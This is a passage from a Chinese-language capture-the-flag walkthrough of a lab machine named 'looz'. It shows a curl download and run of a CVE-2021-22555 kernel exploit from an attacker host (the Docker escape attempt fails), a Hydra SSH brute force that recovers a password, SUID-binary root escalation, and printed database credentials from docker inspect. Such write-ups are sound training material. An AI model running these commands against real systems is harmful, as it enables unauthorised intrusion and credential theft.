11:devices:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
10:hugetlb:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
9:pids:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
8:rdma:/
7:cpuset:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
6:net_cls,net_prio:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
5:freezer:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
4:memory:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
3:perf_event:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
2:cpu,cpuacct:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
1:name=systemd:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
0::/system.slice/containerd.service

• 确定是Docker容器，开始逃逸

9、Docker逃逸（失败）

9.1、CVE-2021-22555、50135.c（失败）

www-data@a5610f5f2480:/var/www/html$ curl -o 50135.c http://192.168.56.3:8080/50135.c
135.c-o 50135.c http://192.168.56.3:8080/501% Total    % Received % Xferd  Average Speed   Time    Time     Time  CurrentDload  Upload   Total   Spent    Left  Speed
100 23023  100 23023    0     0  5620k      0 --:--:-- --:--:-- --:--:-- 7494k
www-data@a5610f5f2480:/var/www/html$ ls
ls
50135.c      wp-activate.php       wp-content         wp-settings.php
exp.c        wp-admin              wp-cron.php        wp-signup.php
index.php    wp-blog-header.php    wp-includes        wp-trackback.php
license.txt  wp-comments-post.php  wp-links-opml.php  xmlrpc.php
linpeas.sh   wp-config-docker.php  wp-load.php
linpeas.txt  wp-config-sample.php  wp-login.php
readme.html  wp-config.php         wp-mail.php
www-data@a5610f5f2480:/var/www/html$ gcc -static 50135.c -o 50135
gcc -static 50135.c -o 50135
www-data@a5610f5f2480:/var/www/html$ ls
ls
50135        readme.html           wp-config.php      wp-mail.php
50135.c      wp-activate.php       wp-content         wp-settings.php
exp.c        wp-admin              wp-cron.php        wp-signup.php
index.php    wp-blog-header.php    wp-includes        wp-trackback.php
license.txt  wp-comments-post.php  wp-links-opml.php  xmlrpc.php
linpeas.sh   wp-config-docker.php  wp-load.php
linpeas.txt  wp-config-sample.php  wp-login.php
www-data@a5610f5f2480:/var/www/html$ ./50135
./50135
[+] Linux Privilege Escalation by theflow@ - 2021[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[-] unshare(CLONE_NEWUSER): Operation not permitted

9.2、其他方法也失败了

10、找其他信息

10.1、WP有用户信息，可能有SSH登录

• 管理员用户只有两条，优先爆破
  • gandalf、john

10.2、SSH密码爆破

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -L user -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.30 ssh[DATA] max 64 tasks per 1 server, overall 64 tasks, 57377596 login tries (l:4/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.30:22/
[STATUS] 4346.00 tries/min, 4346 tries in 00:01h, 57373280 to do in 220:02h, 34 active
[STATUS] 1561.33 tries/min, 4684 tries in 00:03h, 57372951 to do in 612:27h, 25 active
[STATUS] 754.14 tries/min, 5279 tries in 00:07h, 57372358 to do in 1267:57h, 23 active
[STATUS] 431.00 tries/min, 6465 tries in 00:15h, 57371172 to do in 2218:32h, 23 active
[22][ssh] host: 192.168.56.30   login: gandalf   password: highschoolmusical

11、登录SSH

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh gandalf@192.168.56.30     
The authenticity of host '192.168.56.30 (192.168.56.30)' can·t be established.
ED25519 key fingerprint is SHA256:5n6U1TwjeyUVhY7Yczr37MHbaLa8NJl7CdoYRnGrvNw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.30' (ED25519) to the list of known hosts.
gandalf@192.168.56.30's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information as of Sat 11 Nov 2023 04:36:51 PM UTCSystem load:  1.0               Processes:                174Usage of /:   86.2% of 6.82GB   Users logged in:          0Memory usage: 44%               IPv4 address for docker0: 172.17.0.1Swap usage:   0%                IPv4 address for enp0s3:  192.168.56.30=> / is using 86.2% of 6.82GB63 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsgandalf@looz:~$

11.1、常规信息

gandalf@looz:~$ history1  passwd2  ls3  ls -la4  exit5  history
gandalf@looz:~$ sudo -l
[sudo] password for gandalf: 
Sorry, user gandalf may not run sudo on looz.
gandalf@looz:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
gandalf@looz:~$ crontab -l
no crontab for gandalf
gandalf@looz:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
gandalf@looz:~$ hostnamectlStatic hostname: loozIcon name: computer-vmChassis: vmMachine ID: 7d878dded79a47a2ba93e8379f06cbbfBoot ID: 717a56747f4544d3826a9109a209a6d3Virtualization: oracleOperating System: Ubuntu 20.04.2 LTSKernel: Linux 5.4.0-74-genericArchitecture: x86-64
gandalf@looz:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
gandalf@looz:~$ echo $BASH_VERSION
5.0.17(1)-release
gandalf@looz:~$

11.2、文件信息

gandalf@looz:~$ find / -user root -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/fusermount
/home/alatar/Private/shell_testv1.0
gandalf@looz:~$ ls -al /home/alatar/Private/shell_testv1.0
-rwsr-xr-x 1 root root 16848 Jun  7  2021 /home/alatar/Private/shell_testv1.0

12、提权

gandalf@looz:~$ /home/alatar/Private/shell_testv1.0
root@looz:~# whoami
root
root@looz:~# pwd
/home/gandalf
root@looz:~# cd /root
root@looz:/root# ls -al
total 52
drwx------  5 root root 4096 Jun  7  2021 .
drwxr-xr-x 21 root root 4096 Jun  7  2021 ..
-rw-------  1 root root  498 Jun  7  2021 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Jun  7  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   33 Jun  7  2021 root.txt
-rw-r--r--  1 root root   50 Jun  7  2021 rundocker.sh
-rw-r--r--  1 root root   66 Jun  7  2021 .selected_editor
drwxr-xr-x  3 root root 4096 Jun  6  2021 snap
drwx------  2 root root 4096 Jun  6  2021 .ssh
-rw-------  1 root root 8128 Jun  7  2021 .viminfo
root@looz:/root# cat root.txt
ab17850978e36aaf6a2b8808f1ded971
root@looz:/root# cat rundocker.sh
docker start wordpressdb
docker start wpcontainer

12.1、查看Docker容器详情

root@looz:/root# docker ps
CONTAINER ID   IMAGE       COMMAND                  CREATED       STATUS       PORTS                                       NAMES
a5610f5f2480   wordpress   "docker-entrypoint.s…"   2 years ago   Up 9 hours   0.0.0.0:8081->80/tcp, :::8081->80/tcp       wpcontainer
a9400b1a26c0   mariadb     "docker-entrypoint.s…"   2 years ago   Up 9 hours   0.0.0.0:3306->3306/tcp, :::3306->3306/tcp   wordpressdb
root@looz:/root# docker inspect wordpressdb
[{"Id": "a9400b1a26c0639943588727c3bc9a54704d41c80e9a43d390d892b31f9583b5","Created": "2021-06-07T07:48:30.080018169Z","Path": "docker-entrypoint.sh","Args": ["mysqld"],"State": {"Status": "running","Running": true,"Paused": false,"Restarting": false,"OOMKilled": false,"Dead": false,"Pid": 1269,"ExitCode": 0,"Error": "","StartedAt": "2023-11-11T07:23:22.317337592Z","FinishedAt": "2023-11-11T07:23:18.237457911Z"},"Image": "sha256:eff629089685eb7051a239d4217f334580c09e557a9ecfeb2d562a1229d10e7f","ResolvConfPath": "/var/lib/docker/containers/a9400b1a26c0639943588727c3bc9a54704d41c80e9a43d390d892b31f9583b5/resolv.conf","HostnamePath": "/var/lib/docker/containers/a9400b1a26c0639943588727c3bc9a54704d41c80e9a43d390d892b31f9583b5/hostname","HostsPath": "/var/lib/docker/containers/a9400b1a26c0639943588727c3bc9a54704d41c80e9a43d390d892b31f9583b5/hosts","LogPath": "/var/lib/docker/containers/a9400b1a26c0639943588727c3bc9a54704d41c80e9a43d390d892b31f9583b5/a9400b1a26c0639943588727c3bc9a54704d41c80e9a43d390d892b31f9583b5-json.log","Name": "/wordpressdb","RestartCount": 0,"Driver": "overlay2","Platform": "linux","MountLabel": "","ProcessLabel": "","AppArmorProfile": "docker-default","ExecIDs": null,"HostConfig": {"Binds": ["/home/alatar/wordpress/database:/var/lib/mysql"],"ContainerIDFile": "","LogConfig": {"Type": "json-file","Config": {}},"NetworkMode": "default","PortBindings": {"3306/tcp": [{"HostIp": "","HostPort": "3306"}]},"RestartPolicy": {"Name": "unless-stopped","MaximumRetryCount": 0},"AutoRemove": false,"VolumeDriver": "","VolumesFrom": null,"CapAdd": null,"CapDrop": null,"CgroupnsMode": "host","Dns": [],"DnsOptions": [],"DnsSearch": [],"ExtraHosts": null,"GroupAdd": null,"IpcMode": "private","Cgroup": "","Links": null,"OomScoreAdj": 0,"PidMode": "","Privileged": false,"PublishAllPorts": false,"ReadonlyRootfs": false,"SecurityOpt": null,"UTSMode": "","UsernsMode": "","ShmSize": 67108864,"Runtime": "runc","ConsoleSize": [0,0],"Isolation": "","CpuShares": 0,"Memory": 0,"NanoCpus": 0,"CgroupParent": "","BlkioWeight": 0,"BlkioWeightDevice": [],"BlkioDeviceReadBps": null,"BlkioDeviceWriteBps": null,"BlkioDeviceReadIOps": null,"BlkioDeviceWriteIOps": null,"CpuPeriod": 0,"CpuQuota": 0,"CpuRealtimePeriod": 0,"CpuRealtimeRuntime": 0,"CpusetCpus": "","CpusetMems": "","Devices": [],"DeviceCgroupRules": null,"DeviceRequests": null,"KernelMemory": 0,"KernelMemoryTCP": 0,"MemoryReservation": 0,"MemorySwap": 0,"MemorySwappiness": null,"OomKillDisable": false,"PidsLimit": null,"Ulimits": null,"CpuCount": 0,"CpuPercent": 0,"IOMaximumIOps": 0,"IOMaximumBandwidth": 0,"MaskedPaths": ["/proc/asound","/proc/acpi","/proc/kcore","/proc/keys","/proc/latency_stats","/proc/timer_list","/proc/timer_stats","/proc/sched_debug","/proc/scsi","/sys/firmware"],"ReadonlyPaths": ["/proc/bus","/proc/fs","/proc/irq","/proc/sys","/proc/sysrq-trigger"]},"GraphDriver": {"Data": {"LowerDir": "/var/lib/docker/overlay2/686e8165305dd4c6361137598fa749dae7927a3b61f6623247ffda553c008daf-init/diff:/var/lib/docker/overlay2/7bf7288daacdaa974ac1acfe8c499b51556fe4484f76194ed6c9b836b56563fe/diff:/var/lib/docker/overlay2/d01d84e3e00f7639f48a2b43c9ad57d246a7f9b37b74577b3ddc24c84c6c2789/diff:/var/lib/docker/overlay2/c001725ff90167e48d90b27bd63c95f49fb899fd10ea0d8f7c75d976c4bf2f06/diff:/var/lib/docker/overlay2/e91d1fb791cdd44e86d7db3a6cc2a7f6ed8c2be58bdc251ca6a87b25dd9054e7/diff:/var/lib/docker/overlay2/76b0c8e01434a11f1350d49cbe8538b124a59f0e53bb657f4e406af09683368c/diff:/var/lib/docker/overlay2/b07ee9284d67d5dbb404ae79d14d166173c26cd06eb82c575428e2a53ac8bf7c/diff:/var/lib/docker/overlay2/b2809f98e6128cc6da1d6bb577b721c3d344377fe85160e8c231f33f8b5b919d/diff:/var/lib/docker/overlay2/fd8e51ab10a9d83d988553d47dc69efbad1bf78cc82884452eed8eaa0a7fc67c/diff:/var/lib/docker/overlay2/d457cbcfe5e267e9112197801595950badb5f46fe0ac1b9353833ea039273eda/diff:/var/lib/docker/overlay2/b4fe6a608f7194b84764494c58bdacec470492217a033aa7854ecd6a5e80b318/diff:/var/lib/docker/overlay2/47a4ddd9e0cbc338a1d88845d2631006012566e29e97b47df9efa5e3ade53d31/diff:/var/lib/docker/overlay2/b8453dfc62f83fce512be169829cfd5e8649503729384c923d4c2aa57e874f74/diff","MergedDir": "/var/lib/docker/overlay2/686e8165305dd4c6361137598fa749dae7927a3b61f6623247ffda553c008daf/merged","UpperDir": "/var/lib/docker/overlay2/686e8165305dd4c6361137598fa749dae7927a3b61f6623247ffda553c008daf/diff","WorkDir": "/var/lib/docker/overlay2/686e8165305dd4c6361137598fa749dae7927a3b61f6623247ffda553c008daf/work"},"Name": "overlay2"},"Mounts": [{"Type": "bind","Source": "/home/alatar/wordpress/database","Destination": "/var/lib/mysql","Mode": "","RW": true,"Propagation": "rprivate"}],"Config": {"Hostname": "a9400b1a26c0","Domainname": "","User": "","AttachStdin": false,"AttachStdout": false,"AttachStderr": false,"ExposedPorts": {"3306/tcp": {}},"Tty": true,"OpenStdin": true,"StdinOnce": false,"Env": ["MYSQL_USER=dbadmin","MYSQL_PASSWORD=Ba2k3t","MYSQL_DATABASE=wpdb","MYSQL_ROOT_PASSWORD=root-password","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","GOSU_VERSION=1.12","GPG_KEYS=177F4010FE56CA3336300305F1656F24C74CD1D8","MARIADB_MAJOR=10.5","MARIADB_VERSION=1:10.5.10+maria~focal"],"Cmd": ["mysqld"],"Image": "mariadb","Volumes": {"/var/lib/mysql": {}},"WorkingDir": "","Entrypoint": ["docker-entrypoint.sh"],"OnBuild": null,"Labels": {}},"NetworkSettings": {"Bridge": "","SandboxID": "5808d6e7f100eb2625db159117d6ff2efaccdc8854fb3c025dc44e36ea086b3b","HairpinMode": false,"LinkLocalIPv6Address": "","LinkLocalIPv6PrefixLen": 0,"Ports": {"3306/tcp": [{"HostIp": "0.0.0.0","HostPort": "3306"},{"HostIp": "::","HostPort": "3306"}]},"SandboxKey": "/var/run/docker/netns/5808d6e7f100","SecondaryIPAddresses": null,"SecondaryIPv6Addresses": null,"EndpointID": "a65b56265e4d0843417dc0460540d0bb2af93aee6adfc326de5cd7b9dda9ee0a","Gateway": "172.17.0.1","GlobalIPv6Address": "","GlobalIPv6PrefixLen": 0,"IPAddress": "172.17.0.2","IPPrefixLen": 16,"IPv6Gateway": "","MacAddress": "02:42:ac:11:00:02","Networks": {"bridge": {"IPAMConfig": null,"Links": null,"Aliases": null,"NetworkID": "6a944c72ac1082897979125785c02f63a6a03786099319498c7199f6b3ddfe9f","EndpointID": "a65b56265e4d0843417dc0460540d0bb2af93aee6adfc326de5cd7b9dda9ee0a","Gateway": "172.17.0.1","IPAddress": "172.17.0.2","IPPrefixLen": 16,"IPv6Gateway": "","GlobalIPv6Address": "","GlobalIPv6PrefixLen": 0,"MacAddress": "02:42:ac:11:00:02","DriverOpts": null}}}}
]
root@looz:/root# docker inspect wpcontainer
[{"Id": "a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154","Created": "2021-06-07T07:59:51.624171894Z","Path": "docker-entrypoint.sh","Args": ["apache2-foreground"],"State": {"Status": "running","Running": true,"Paused": false,"Restarting": false,"OOMKilled": false,"Dead": false,"Pid": 1360,"ExitCode": 0,"Error": "","StartedAt": "2023-11-11T07:23:23.642901841Z","FinishedAt": "2023-11-11T07:23:18.237749393Z"},"Image": "sha256:c2dd1984ad5b76e05b8d97531147993bf6d93216fbccbadd7701be78f7129fe8","ResolvConfPath": "/var/lib/docker/containers/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154/resolv.conf","HostnamePath": "/var/lib/docker/containers/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154/hostname","HostsPath": "/var/lib/docker/containers/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154/hosts","LogPath": "/var/lib/docker/containers/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154-json.log","Name": "/wpcontainer","RestartCount": 0,"Driver": "overlay2","Platform": "linux","MountLabel": "","ProcessLabel": "","AppArmorProfile": "docker-default","ExecIDs": null,"HostConfig": {"Binds": ["/home/alatar/wordpress/html:/var/www/html"],"ContainerIDFile": "","LogConfig": {"Type": "json-file","Config": {}},"NetworkMode": "default","PortBindings": {"80/tcp": [{"HostIp": "","HostPort": "8081"}]},"RestartPolicy": {"Name": "unless-stopped","MaximumRetryCount": 0},"AutoRemove": false,"VolumeDriver": "","VolumesFrom": null,"CapAdd": null,"CapDrop": null,"CgroupnsMode": "host","Dns": [],"DnsOptions": [],"DnsSearch": [],"ExtraHosts": null,"GroupAdd": null,"IpcMode": "private","Cgroup": "","Links": ["/wordpressdb:/wpcontainer/mysql"],"OomScoreAdj": 0,"PidMode": "","Privileged": false,"PublishAllPorts": false,"ReadonlyRootfs": false,"SecurityOpt": null,"UTSMode": "","UsernsMode": "","ShmSize": 67108864,"Runtime": "runc","ConsoleSize": [0,0],"Isolation": "","CpuShares": 0,"Memory": 0,"NanoCpus": 0,"CgroupParent": "","BlkioWeight": 0,"BlkioWeightDevice": [],"BlkioDeviceReadBps": null,"BlkioDeviceWriteBps": null,"BlkioDeviceReadIOps": null,"BlkioDeviceWriteIOps": null,"CpuPeriod": 0,"CpuQuota": 0,"CpuRealtimePeriod": 0,"CpuRealtimeRuntime": 0,"CpusetCpus": "","CpusetMems": "","Devices": [],"DeviceCgroupRules": null,"DeviceRequests": null,"KernelMemory": 0,"KernelMemoryTCP": 0,"MemoryReservation": 0,"MemorySwap": 0,"MemorySwappiness": null,"OomKillDisable": false,"PidsLimit": null,"Ulimits": null,"CpuCount": 0,"CpuPercent": 0,"IOMaximumIOps": 0,"IOMaximumBandwidth": 0,"MaskedPaths": ["/proc/asound","/proc/acpi","/proc/kcore","/proc/keys","/proc/latency_stats","/proc/timer_list","/proc/timer_stats","/proc/sched_debug","/proc/scsi","/sys/firmware"],"ReadonlyPaths": ["/proc/bus","/proc/fs","/proc/irq","/proc/sys","/proc/sysrq-trigger"]},"GraphDriver": {"Data": {"LowerDir": "/var/lib/docker/overlay2/d5a6e9f9176c1b438582628d6cc4638d4c4bca759bf0b84fd22c192fd34d45a4-init/diff:/var/lib/docker/overlay2/ab9c81d7d674a2048cec0f01f3789bb08b8b9abd4791caad810e4df2592829a6/diff:/var/lib/docker/overlay2/cbb9e00539c3aaa9499c9dd9087beba11544d4f10a4214dae0f6f7520dfee90b/diff:/var/lib/docker/overlay2/4ebede3eaca84d10b2b704fb798cf433c2877dd7987fc2d17f649dac75372d31/diff:/var/lib/docker/overlay2/a853a8b2dc8923bc6bf99baca9d237ce4bddcd334ec16dc47b3a8048e3b1a2e2/diff:/var/lib/docker/overlay2/89722af617a14a3c860bb451e7c87a6ddf67084d78bbe99712aeead3975b0f7f/diff:/var/lib/docker/overlay2/fae06e76c9ee8c3c0a950cf7f21eb67f0896330396fb2b3c764c60fe5f3b50af/diff:/var/lib/docker/overlay2/7320e0fb62029db451070c5154f5ffe0255f2546680283823eebef1293850db8/diff:/var/lib/docker/overlay2/402e0d5d9df609bd867e3e34ebed84a7c15289f5946876069fd2c5dfb164184c/diff:/var/lib/docker/overlay2/6cc179be621460eb2b07960870414ccb00d02b9a3afbb5e918f1fa96417307bb/diff:/var/lib/docker/overlay2/21b82cfe7f14239e66bf047fe50fee13754c324e0add6968be075a21a26da7fd/diff:/var/lib/docker/overlay2/3e144bc42c2e81fd49adf2f047490bb13c053836e24c55c944a0c7910f02b5ea/diff:/var/lib/docker/overlay2/6b1ffefa6f1dca215714e9c401b6c3fc0bc95c16704abfe00c74026e59e74699/diff:/var/lib/docker/overlay2/6af3314ee66b5ff38155e6d55165c120a7fdd0f1ef4ee40e21b2f4c272348fc0/diff:/var/lib/docker/overlay2/e31031b64531fb14adebb449d7e3af936cf451ab4b0e5d2d87eb11971b8ef108/diff:/var/lib/docker/overlay2/c80d9352d49e712d11f6f49d5fc5652628bf65beb4005bee603d3131c2f089d2/diff:/var/lib/docker/overlay2/c1a9f2387a31f3d2b8f10a020e6c34b099879c58eb29cfaa9a50217c71df67eb/diff:/var/lib/docker/overlay2/d9ce30d2dbcd3798dafb09228a5e51f7172a3fe8b9e2d3327f37327e4d89b0f1/diff:/var/lib/docker/overlay2/1aeb6c55a0a520ef157e9c20949c46ae355e017a576e19bf27385e3b3bb4c3e0/diff:/var/lib/docker/overlay2/24f3082a6da03c68f2932cd7d5fee06bff3af7607d632205855831b2a17db193/diff:/var/lib/docker/overlay2/e52e5dea861012d1bbd02409f977afdc69509df1fb27c61781d69dfcacef071c/diff:/var/lib/docker/overlay2/fe6c2da312a0b4d041e4d7a963cc69abdf75435b8136122e4b3e8428624addcc/diff","MergedDir": "/var/lib/docker/overlay2/d5a6e9f9176c1b438582628d6cc4638d4c4bca759bf0b84fd22c192fd34d45a4/merged","UpperDir": "/var/lib/docker/overlay2/d5a6e9f9176c1b438582628d6cc4638d4c4bca759bf0b84fd22c192fd34d45a4/diff","WorkDir": "/var/lib/docker/overlay2/d5a6e9f9176c1b438582628d6cc4638d4c4bca759bf0b84fd22c192fd34d45a4/work"},"Name": "overlay2"},"Mounts": [{"Type": "bind","Source": "/home/alatar/wordpress/html","Destination": "/var/www/html","Mode": "","RW": true,"Propagation": "rprivate"}],"Config": {"Hostname": "a5610f5f2480","Domainname": "","User": "","AttachStdin": false,"AttachStdout": false,"AttachStderr": false,"ExposedPorts": {"80/tcp": {}},"Tty": true,"OpenStdin": true,"StdinOnce": false,"Env": ["WORDPRESS_DB_PASSWORD=Ba2k3t","WORDPRESS_DB_NAME=wpdb","WORDPRESS_DB_USER=dbadmin","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","PHPIZE_DEPS=autoconf \t\tdpkg-dev \t\tfile \t\tg++ \t\tgcc \t\tlibc-dev \t\tmake \t\tpkg-config \t\tre2c","PHP_INI_DIR=/usr/local/etc/php","APACHE_CONFDIR=/etc/apache2","APACHE_ENVVARS=/etc/apache2/envvars","PHP_EXTRA_BUILD_DEPS=apache2-dev","PHP_EXTRA_CONFIGURE_ARGS=--with-apxs2 --disable-cgi","PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64","PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64","PHP_LDFLAGS=-Wl,-O1 -pie","GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312","PHP_VERSION=7.4.20","PHP_URL=https://www.php.net/distributions/php-7.4.20.tar.xz","PHP_ASC_URL=https://www.php.net/distributions/php-7.4.20.tar.xz.asc","PHP_SHA256=1fa46ca6790d780bf2cb48961df65f0ca3640c4533f0bca743cd61b71cb66335"],"Cmd": ["apache2-foreground"],"Image": "wordpress","Volumes": {"/var/www/html": {}},"WorkingDir": "/var/www/html","Entrypoint": ["docker-entrypoint.sh"],"OnBuild": null,"Labels": {},"StopSignal": "SIGWINCH"},"NetworkSettings": {"Bridge": "","SandboxID": "d105ba5855cf1d0c1d6248e785cbf86a6f2341892c0dd0b8119cae238d81f239","HairpinMode": false,"LinkLocalIPv6Address": "","LinkLocalIPv6PrefixLen": 0,"Ports": {"80/tcp": [{"HostIp": "0.0.0.0","HostPort": "8081"},{"HostIp": "::","HostPort": "8081"}]},"SandboxKey": "/var/run/docker/netns/d105ba5855cf","SecondaryIPAddresses": null,"SecondaryIPv6Addresses": null,"EndpointID": "b08bd4d30f201e13f7d046100161cbdfc5371c6bd1d61947298c64352c5036eb","Gateway": "172.17.0.1","GlobalIPv6Address": "","GlobalIPv6PrefixLen": 0,"IPAddress": "172.17.0.3","IPPrefixLen": 16,"IPv6Gateway": "","MacAddress": "02:42:ac:11:00:03","Networks": {"bridge": {"IPAMConfig": null,"Links": null,"Aliases": null,"NetworkID": "6a944c72ac1082897979125785c02f63a6a03786099319498c7199f6b3ddfe9f","EndpointID": "b08bd4d30f201e13f7d046100161cbdfc5371c6bd1d61947298c64352c5036eb","Gateway": "172.17.0.1","IPAddress": "172.17.0.3","IPPrefixLen": 16,"IPv6Gateway": "","GlobalIPv6Address": "","GlobalIPv6PrefixLen": 0,"MacAddress": "02:42:ac:11:00:03","DriverOpts": null}}}}
]
root@looz:/root#